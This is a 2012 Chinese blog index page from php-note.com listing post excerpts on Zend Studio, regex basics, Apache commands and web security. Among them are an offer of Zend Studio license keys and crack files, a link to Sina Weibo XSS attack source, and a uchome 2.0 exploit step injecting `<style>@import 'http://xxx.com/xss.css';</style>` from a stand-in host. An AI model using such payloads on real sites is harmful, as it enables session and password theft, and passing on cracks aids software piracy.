不灭的焱

革命尚未成功,同志仍须努力

作者:php-note.com  发布于:2012-05-31 22:49  分类:电脑/软件使用 

感谢geekso提供的帮助,获取到了最新Zend Studio 9.0.3正式版注册码与破解文件下载。

Zend Studio 9.0 beta版已经发布有段时间了,官网主要包含以下更新:

1.Git和Github支持

2.云开发部署

3.深度Zend Framework和Zend Server集成

作者:php-note.com  发布于:2012-05-30 19:13  分类:Linux软件安装/优化 
作者:php-note.com  发布于:2012-05-30 17:59  分类:编程基础/Web安全 

CSV其实就是 COMMA SEPARATED VALUE 的缩写,出现在档案总管中的档案类型是「逗号分格」,依计算机原来的设定,如果直接点选该档案,计算机将以EXCEL的模式开启该档案。

作者:php-note.com  发布于:2012-05-30 11:32  分类:Apache/Nginx 

1、查看apache进程:

ps aux | grep httpd | grep -v grep | wc -l

2、查看80端口的tcp连接:

作者:php-note.com  发布于:2012-05-30 10:16  分类:编程基础/Web安全 

新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)

作者:php-note.com  发布于:2012-05-30 01:56  分类:编程基础/Web安全 

0x01. XSS获取明文密码的多种方式

我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火。浏览器们在客户端瓜分着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题。

作者:php-note.com  发布于:2012-05-30 01:05  分类:PHP基础 

9. 单词边界

元字符<<\b>>也是一种对位置进行匹配的“锚”。这种匹配是0长度匹配。

有4种位置被认为是“单词边界”:

1) 在字符串的第一个字符前的位置(如果字符串的第一个字符是一个“单词字符”)

2) 在字符串的最后一个字符后的位置(如果字符串的最后一个字符是一个“单词字符”)

3) 在一个“单词字符”和“非单词字符”之间,其中“非单词字符”紧跟在“单词字符”之后

4) 在一个“非单词字符”和“单词字符”之间,其中“单词字符”紧跟在“非单词字符”后面

作者:php-note.com  发布于:2012-05-30 01:02  分类:PHP基础 

1.什么是正则表达式

基本说来,正则表达式是一种用来描述一定数量文本的模式。Regex代表Regular Express。本文将用<<regex>>来表示一段具体的正则表达式。

一段文本就是最基本的模式,简单的匹配相同的文本。

2.不同的正则表达式引擎

正则表达式引擎是一种可以处理正则表达式的软件。通常,引擎是更大的应用程序的一部分。在软件世界,不同的正则表达式并不互相兼容。本教程会集中讨论Perl 5 类型的引擎,因为这种引擎是应用最广泛的引擎。同时我们也会提到一些和其他引擎的区别。许多近代的引擎都很类似,但不完全一样。例如.NET正则库,JDK正则包。

作者:php-note.com  发布于:2012-05-29 23:04  分类:编程基础/Web安全 

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

作者:php-note.com  发布于:2012-05-29 23:03  分类:编程基础/Web安全 

利用条件:开启注册&&开启投稿

方法 :注册会员 -> 发表文章:内容输入

<style>@import 'http://xxx.com/xss.css';</style>